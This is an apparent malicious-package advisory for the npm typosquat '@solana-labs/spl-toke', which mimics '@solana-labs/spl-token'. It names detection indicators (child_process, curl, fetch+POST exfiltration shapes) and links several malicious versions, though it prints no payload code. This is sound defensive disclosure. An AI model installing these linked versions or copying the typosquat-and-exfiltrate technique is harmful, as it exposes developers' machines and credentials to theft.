—

MAL-2026-5787

Malicious code in @solana-labs/spl-toke (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (490ce5d7e43d8a79aa85bbd24e7140ed074eee472f375092ab9b4cd650ce41f8) Package name `@solana-labs/spl-toke` is a one-character omission of the legitimate `@solana-labs/spl-token` package, abusing the official Solana Labs scope-and-name shape to confuse installers. The bundled outputs at lib/index.cjs.js and lib/index.esm.js contain repeated co-occurrences of `require('child_process')`, `curl` invocations, `fetch(` calls, and `POST` request shapes spread across many lines (e.g. cjs lines 11441, 11466, 11479, 11495, 11535 for child_process; lines 11441, 11495, 11535, 11589, 11629 for curl; lines 5041/5046, 11464, 11558, 11652 for fetch+POST). The combination of (a) a clear typosquat against a top-tier blockchain SDK namespace and (b) bundled subprocess + outbound HTTP primitives in a package that purports to be a thin SPL-token client matches the supply-chain dropper/exfil shape and should not be allowed to install on developer or build machines.

Are you affected?

Enter the version of the package you're using.

Affected packages

npm / @solana-labs/spl-toke

No fixed version published yet for @solana-labs/spl-toke (npm). Pin to a known-safe version or switch to an alternative.

References

https://www.npmjs.com/package/@solana-labs/spl-toke/v/1.0.10 [PACKAGE]
https://www.npmjs.com/package/@solana-labs/spl-toke/v/1.98.112 [PACKAGE]
https://www.npmjs.com/package/@solana-labs/spl-toke/v/1.0.5 [PACKAGE]
https://www.npmjs.com/package/@solana-labs/spl-toke/v/1.0.6 [PACKAGE]
https://www.npmjs.com/package/@solana-labs/spl-toke/v/1.0.7 [PACKAGE]
https://www.npmjs.com/package/@solana-labs/spl-toke/v/1.0.0 [PACKAGE]
https://www.npmjs.com/package/@solana-labs/spl-toke/v/1.98.111 [PACKAGE]
https://www.npmjs.com/package/@solana-labs/spl-toke/v/1.0.8 [PACKAGE]